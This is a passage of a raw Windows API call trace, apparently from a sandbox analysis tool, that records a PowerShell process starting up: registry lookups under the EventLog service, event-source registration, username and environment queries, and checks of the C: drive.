	[0536.338] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.338] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x370) returned 0x0
	[0536.338] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.338] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x374) returned 0x0
	[0536.338] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.338] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x378) returned 0x0
	[0536.338] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.338] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x37c) returned 0x0
	[0536.338] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.339] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x380) returned 0x0
	[0536.339] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.339] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x384) returned 0x0
	[0536.339] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x388) returned 0x0
	[0536.339] RegCloseKey (hKey=0x388) returned 0x0
	[0536.339] RegCloseKey (hKey=0x364) returned 0x0
	[0536.339] RegCloseKey (hKey=0x384) returned 0x0
	[0536.341] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xecf58 | out: phkResult=0xecf58*=0x384) returned 0x0
	[0536.341] RegQueryInfoKeyW (in: hKey=0x384, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xececc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xecec8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xececc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xecec8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.341] CoTaskMemFree (pv=0x0) 
	[0536.341] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.341] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x0, lpName=0x2c9220, lpcchName=0xecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.341] CoTaskMemFree (pv=0x2c9220) 
	[0536.341] CoTaskMemFree (pv=0x0) 
	[0536.341] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.341] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x1, lpName=0x2c9220, lpcchName=0xecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.341] CoTaskMemFree (pv=0x2c9220) 
	[0536.341] CoTaskMemFree (pv=0x0) 
	[0536.341] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.342] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x2, lpName=0x2c9220, lpcchName=0xecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.342] CoTaskMemFree (pv=0x2c9220) 
	[0536.342] CoTaskMemFree (pv=0x0) 
	[0536.342] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.342] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x3, lpName=0x2c9220, lpcchName=0xecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.342] CoTaskMemFree (pv=0x2c9220) 
	[0536.342] CoTaskMemFree (pv=0x0) 
	[0536.342] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.342] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x4, lpName=0x2c9220, lpcchName=0xecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.342] CoTaskMemFree (pv=0x2c9220) 
	[0536.342] CoTaskMemFree (pv=0x0) 
	[0536.342] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.342] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x5, lpName=0x2c9220, lpcchName=0xecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.342] CoTaskMemFree (pv=0x2c9220) 
	[0536.342] CoTaskMemFree (pv=0x0) 
	[0536.342] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.342] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x6, lpName=0x2c9220, lpcchName=0xecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.342] CoTaskMemFree (pv=0x2c9220) 
	[0536.342] CoTaskMemFree (pv=0x0) 
	[0536.342] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.342] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x7, lpName=0x2c9220, lpcchName=0xecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.342] CoTaskMemFree (pv=0x2c9220) 
	[0536.342] CoTaskMemFree (pv=0x0) 
	[0536.342] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.342] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x8, lpName=0x2c9220, lpcchName=0xecf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xecf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.342] CoTaskMemFree (pv=0x2c9220) 
	[0536.342] CoTaskMemFree (pv=0x0) 
	[0536.343] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x364) returned 0x0
	[0536.343] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x0) returned 0x2
	[0536.343] RegOpenKeyExW (in: hKey=0x384, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x388) returned 0x0
	[0536.343] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x0) returned 0x2
	[0536.343] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x38c) returned 0x0
	[0536.343] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x0) returned 0x2
	[0536.343] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x390) returned 0x0
	[0536.343] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x0) returned 0x2
	[0536.343] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x394) returned 0x0
	[0536.343] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x0) returned 0x2
	[0536.343] RegOpenKeyExW (in: hKey=0x384, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x398) returned 0x0
	[0536.343] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x0) returned 0x2
	[0536.344] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x39c) returned 0x0
	[0536.344] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x0) returned 0x2
	[0536.344] RegOpenKeyExW (in: hKey=0x384, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x3a0) returned 0x0
	[0536.344] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x0) returned 0x2
	[0536.344] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x3a4) returned 0x0
	[0536.344] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfb8 | out: phkResult=0xecfb8*=0x3a8) returned 0x0
	[0536.344] RegCloseKey (hKey=0x3a8) returned 0x0
	[0536.344] RegCloseKey (hKey=0x384) returned 0x0
	[0536.345] RegCloseKey (hKey=0x3a4) returned 0x0
	[0536.351] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b930008
	[0537.316] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dbbc00*="WSMan", lpRawData=0x2dbb970) returned 1
	[0537.317] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0537.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.317] CoTaskMemFree (pv=0x30a930) 
	[0537.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0537.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0537.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0537.320] CoTaskMemAlloc (cb=0x804) returned 0x1b85e960
	[0537.320] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b85e960, nSize=0xed248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed248) returned 0x1
	[0537.320] CoTaskMemFree (pv=0x1b85e960) 
	[0537.320] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0537.320] GetUserNameW (in: lpBuffer=0x2c9220, pcbBuffer=0xed288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed288) returned 1
	[0537.320] CoTaskMemFree (pv=0x2c9220) 
	[0537.321] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dc1138*="Alias", lpRawData=0x2dc0ec8) returned 1
	[0537.322] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0537.322] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.322] CoTaskMemFree (pv=0x30a930) 
	[0537.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0537.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0537.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0537.325] CoTaskMemAlloc (cb=0x804) returned 0x1b85e960
	[0537.325] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b85e960, nSize=0xed248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed248) returned 0x1
	[0537.325] CoTaskMemFree (pv=0x1b85e960) 
	[0537.325] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0537.325] GetUserNameW (in: lpBuffer=0x2c9220, pcbBuffer=0xed288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed288) returned 1
	[0537.326] CoTaskMemFree (pv=0x2c9220) 
	[0537.326] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dc6730*="Environment", lpRawData=0x2dc64c0) returned 1
	[0537.327] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0537.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.328] CoTaskMemFree (pv=0x30a930) 
	[0537.329] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0537.329] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0537.329] CoTaskMemFree (pv=0x30a930) 
	[0537.329] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0537.329] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0537.329] CoTaskMemFree (pv=0x30a930) 
	[0537.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xecdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0537.330] SetErrorMode (uMode=0x1) returned 0x1
	[0537.330] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xed000 | out: lpFileInformation=0xed000*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0537.330] SetErrorMode (uMode=0x1) returned 0x1
	[0537.331] GetLogicalDrives () returned 0x4
	[0537.331] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xecb60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0537.333] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0537.333] SetErrorMode (uMode=0x1) returned 0x1
	[0537.334] CoTaskMemAlloc (cb=0x68) returned 0x32d250
	[0537.334] CoTaskMemAlloc (cb=0x68) returned 0x32d1e0
	[0537.334] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x32d250, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xecfd0, lpMaximumComponentLength=0xecfcc, lpFileSystemFlags=0xecfc8, lpFileSystemNameBuffer=0x32d1e0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xecfd0*=0x9c354b42, lpMaximumComponentLength=0xecfcc*=0xff, lpFileSystemFlags=0xecfc8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0537.334] CoTaskMemFree (pv=0x32d250) 
	[0537.334] CoTaskMemFree (pv=0x32d1e0) 
	[0537.334] SetErrorMode (uMode=0x1) returned 0x1
	[0537.334] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0537.335] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecd10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0537.335] SetErrorMode (uMode=0x1) returned 0x1
	[0537.335] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xecf70 | out: lpFileInformation=0xecf70*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0537.336] SetErrorMode (uMode=0x1) returned 0x1
	[0537.336] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecd10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0537.336] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xecbc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0537.336] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0537.336] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0537.336] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0537.337] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0537.337] SetErrorMode (uMode=0x1) returned 0x1
	[0537.337] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xecda0 | out: lpFileInformation=0xecda0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0537.338] SetErrorMode (uMode=0x1) returned 0x1
	[0537.338] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0537.338] SetErrorMode (uMode=0x1) returned 0x1
	[0537.338] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xecda0 | out: lpFileInformation=0xecda0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0537.338] SetErrorMode (uMode=0x1) returned 0x1
	[0537.338] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecbe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0537.338] SetErrorMode (uMode=0x1) returned 0x1
	[0537.338] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xece40 | out: lpFileInformation=0xece40*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0537.338] SetErrorMode (uMode=0x1) returned 0x1
	[0537.339] CoTaskMemAlloc (cb=0x804) returned 0x1b85e960
	[0537.339] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b85e960, nSize=0xed248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed248) returned 0x1
	[0537.339] CoTaskMemFree (pv=0x1b85e960) 
	[0537.339] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0537.339] GetUserNameW (in: lpBuffer=0x2c9220, pcbBuffer=0xed288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed288) returned 1
	[0537.339] CoTaskMemFree (pv=0x2c9220) 
	[0537.340] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dcd820*="FileSystem", lpRawData=0x2dcd5b0) returned 1
	[0537.341] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0537.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.341] CoTaskMemFree (pv=0x30a930) 
	[0537.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0537.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0537.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0537.343] CoTaskMemAlloc (cb=0x804) returned 0x1b85e960
	[0537.343] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b85e960, nSize=0xed248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed248) returned 0x1
	[0537.343] CoTaskMemFree (pv=0x1b85e960) 
	[0537.343] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0537.343] GetUserNameW (in: lpBuffer=0x2c9220, pcbBuffer=0xed288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed288) returned 1
	[0537.344] CoTaskMemFree (pv=0x2c9220) 
	[0537.344] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dd3060*="Function", lpRawData=0x2dd2df0) returned 1
	[0537.348] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0537.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.348] CoTaskMemFree (pv=0x30a930) 
	[0537.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
